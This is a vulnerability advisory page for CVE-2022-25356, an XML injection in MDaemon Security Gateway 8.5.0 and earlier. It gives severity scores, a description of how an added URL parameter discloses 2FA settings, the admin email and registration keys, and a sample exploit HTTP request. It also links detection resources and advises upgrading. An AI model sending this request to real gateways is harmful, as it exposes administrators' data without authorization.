🔙 목록으로 돌아가기

CVE-2022-25356: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection

TitleAlt-n/MDaemon Security Gateway <=8.5.0 - XML Injection
AuthorAkincibor
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation.
RemediationUpgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability.
CVSS Score5.3
EPSS Score0.72874
CVE IDCVE-2022-25356
CWE IDCWE-91
Tags cve cve2022 altn gateway xml injection vuln

🔍 Vulnerability Description

Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys.

🌐 HTTP Request

GET /SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25356.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25356.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A